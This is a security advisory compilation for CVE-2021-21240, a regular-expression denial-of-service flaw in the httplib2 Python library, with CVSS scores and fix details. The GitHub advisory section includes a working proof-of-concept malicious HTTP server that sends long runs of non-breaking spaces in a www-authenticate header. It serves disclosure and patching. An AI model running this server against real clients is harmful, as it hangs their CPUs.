{ affected: [ { package: { ecosystem: "PyPI", name: "httplib2", }, ranges: [ { events: [ { introduced: "0", }, { fixed: "0.19.0", }, ], type: "ECOSYSTEM", }, ], }, ], aliases: [ "CVE-2021-21240", ], database_specific: { cwe_ids: [ "CWE-400", ], github_reviewed: true, github_reviewed_at: "2021-02-08T19:41:34Z", nvd_published_at: "2021-02-08T20:15:00Z", severity: "HIGH", }, details: "### Impact\nA malicious server which responds with long series of `\\xa0` characters in the `www-authenticate` header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server.\n\n### Patches\nVersion 0.19.0 contains new implementation of auth headers parsing, using pyparsing library.\nhttps://github.com/httplib2/httplib2/pull/182\n\n### Workarounds\n```py\nimport httplib2\nhttplib2.USE_WWW_AUTH_STRICT_PARSING = True\n```\n\n### Technical Details\n\nThe vulnerable regular expression is https://github.com/httplib2/httplib2/blob/595e248d0958c00e83cb28f136a2a54772772b50/python3/httplib2/__init__.py#L336-L338\n\nThe section before the equals sign contains multiple overlapping groups. 
Ignoring the optional part containing a comma, we have:\n\n \\s*[^ \\t\\r\\n=]+\\s*=\n\nSince all three infinitely repeating groups accept the non-breaking space character `\\xa0`, a long string of `\\xa0` causes catastrophic backtracking.\n\nThe complexity is cubic, so doubling the length of the malicious string of `\\xa0` makes processing take 8 times as long.\n\n### Reproduction Steps\n\nRun a malicious server which responds with\n\n www-authenticate: x \\xa0\\xa0\\xa0\\xa0x\n\nbut with many more `\\xa0` characters.\n\nAn example malicious python server is below:\n\n```py\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\ndef make_header_value(n_spaces):\n repeat = \"\\xa0\" * n_spaces\n return f\"x {repeat}x\"\n\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n self.log_request(401)\n self.send_response_only(401) # Don't bother sending Server and Date\n n_spaces = (\n int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences\n if len(self.path) > 1 else\n 65512 # Max header line length 65536\n )\n value = make_header_value(n_spaces)\n self.send_header(\"www-authenticate\", value) # This header can actually be sent multiple times\n self.end_headers()\n\nif __name__ == \"__main__\":\n HTTPServer((\"\", 1337), Handler).serve_forever()\n```\n\nConnect to the server with httplib2:\n\n```py\nimport httplib2\nhttplib2.Http(\".cache\").request(\"http://localhost:1337\", \"GET\")\n```\n\nTo benchmark performance with shorter strings, you can set the path to a number e.g. 
http://localhost:1337/1000\n\n\n### References\nThanks to [Ben Caller](https://github.com/b-c-ds) ([Doyensec](https://doyensec.com)) for finding vulnerability and discrete notification.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [httplib2](https://github.com/httplib2/httplib2/issues/new)\n* Email [current maintainer at 2021-01](mailto:temotor@gmail.com)", id: "GHSA-93xj-8mrv-444m", modified: "2024-09-23T16:13:16Z", published: "2021-02-08T19:41:59Z", references: [ { type: "WEB", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { type: "ADVISORY", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", }, { type: "WEB", url: "https://github.com/httplib2/httplib2/pull/182", }, { type: "WEB", url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { type: "PACKAGE", url: "https://github.com/httplib2/httplib2", }, { type: "WEB", url: "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2021-16.yaml", }, { type: "WEB", url: "https://pypi.org/project/httplib2", }, ], schema_version: "1.4.0", severity: [ { score: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", type: "CVSS_V3", }, { score: "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P", type: "CVSS_V4", }, ], summary: "Regular Expression Denial of Service (REDoS) in httplib2", }
gsd-2021-21240
Vulnerability from gsd
{ GSD: { alias: "CVE-2021-21240", description: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", id: "GSD-2021-21240", references: [ "https://www.suse.com/security/cve/CVE-2021-21240.html", "https://access.redhat.com/errata/RHSA-2021:2116", "https://advisories.mageia.org/CVE-2021-21240.html", "https://security.archlinux.org/CVE-2021-21240", ], }, gsd: { metadata: { exploitCode: "unknown", remediation: "unknown", reportConfidence: "confirmed", type: "vulnerability", }, osvSchema: { aliases: [ "CVE-2021-21240", ], details: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. 
This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", id: "GSD-2021-21240", modified: "2023-12-13T01:23:10.963057Z", schema_version: "1.4.0", }, }, namespaces: { "cve.org": { CVE_data_meta: { ASSIGNER: "security-advisories@github.com", ID: "CVE-2021-21240", STATE: "PUBLIC", TITLE: "Regular Expression Denial of Service in httplib2", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "httplib2", version: { version_data: [ { version_value: "< 0.19.0", }, ], }, }, ], }, vendor_name: "httplib2", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. 
This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", }, ], }, impact: { cvss: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-400 Uncontrolled Resource Consumption", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", refsource: "CONFIRM", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { name: "https://github.com/httplib2/httplib2/pull/182", refsource: "MISC", url: "https://github.com/httplib2/httplib2/pull/182", }, { name: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", refsource: "MISC", url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { name: "https://pypi.org/project/httplib2", refsource: "MISC", url: "https://pypi.org/project/httplib2", }, ], }, source: { advisory: "GHSA-93xj-8mrv-444m", discovery: "UNKNOWN", }, }, "gitlab.com": { advisories: [ { affected_range: "<0.19.0", affected_versions: "All versions before 0.19.0", cvss_v2: "AV:N/AC:L/Au:N/C:N/I:N/A:P", cvss_v3: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", cwe_ids: [ "CWE-1035", "CWE-400", "CWE-937", ], date: "2021-02-12", description: "httplib2 is a comprehensive HTTP client library for Python. 
In httplib2, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server.", fixed_versions: [ "0.19.0", ], identifier: "CVE-2021-21240", identifiers: [ "CVE-2021-21240", "GHSA-93xj-8mrv-444m", ], not_impacted: "All versions starting from 0.19.0", package_slug: "pypi/httplib2", pubdate: "2021-02-08", solution: "Upgrade to version 0.19.0 or above.", title: "Uncontrolled Resource Consumption", urls: [ "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", ], uuid: "6520f221-0fd9-4d4c-850e-b8b9d243f85f", }, ], }, "nvd.nist.gov": { configurations: { CVE_data_version: "4.0", nodes: [ { children: [], cpe_match: [ { cpe23Uri: "cpe:2.3:a:httplib2_project:httplib2:*:*:*:*:*:python:*:*", cpe_name: [], versionEndExcluding: "0.19.0", vulnerable: true, }, ], operator: "OR", }, ], }, cve: { CVE_data_meta: { ASSIGNER: "security-advisories@github.com", ID: "CVE-2021-21240", }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "en", value: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. 
This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "en", value: "CWE-400", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", refsource: "MISC", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { name: "https://github.com/httplib2/httplib2/pull/182", refsource: "MISC", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/pull/182", }, { name: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", refsource: "CONFIRM", tags: [ "Exploit", "Mitigation", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { name: "https://pypi.org/project/httplib2", refsource: "MISC", tags: [ "Product", "Third Party Advisory", ], url: "https://pypi.org/project/httplib2", }, ], }, }, impact: { baseMetricV2: { acInsufInfo: false, cvssV2: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", integrityImpact: "NONE", vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, severity: "MEDIUM", userInteractionRequired: false, }, baseMetricV3: { cvssV3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, }, }, 
lastModifiedDate: "2021-02-12T14:56Z", publishedDate: "2021-02-08T20:15Z", }, }, }
pysec-2021-16
Vulnerability from pysec
httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of "\xa0" characters in the "www-authenticate" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.
Name | purl |
---|---|
httplib2 | pkg:pypi/httplib2 |
{ affected: [ { package: { ecosystem: "PyPI", name: "httplib2", purl: "pkg:pypi/httplib2", }, ranges: [ { events: [ { introduced: "0", }, { fixed: "bd9ee252c8f099608019709e22c0d705e98d26bc", }, ], repo: "https://github.com/httplib2/httplib2", type: "GIT", }, { events: [ { introduced: "0", }, { fixed: "0.19.0", }, ], type: "ECOSYSTEM", }, ], versions: [ "0.7.0", "0.7.1", "0.7.2", "0.7.3", "0.7.4", "0.7.5", "0.7.6", "0.7.7", "0.8", "0.9", "0.9.1", "0.9.2", "0.10.3", "0.11.0", "0.11.1", "0.11.3", "0.12.0", "0.12.1", "0.12.3", "0.13.0", "0.13.1", "0.14.0", "0.15.0", "0.16.0", "0.17.0", "0.17.1", "0.17.2", "0.17.3", "0.17.4", "0.18.0", "0.18.1", ], }, ], aliases: [ "CVE-2021-21240", "GHSA-93xj-8mrv-444m", ], details: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", id: "PYSEC-2021-16", modified: "2021-02-12T14:56:00Z", published: "2021-02-08T20:15:00Z", references: [ { type: "FIX", url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { type: "WEB", url: "https://github.com/httplib2/httplib2/pull/182", }, { type: "ADVISORY", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { type: "PACKAGE", url: "https://pypi.org/project/httplib2", }, ], }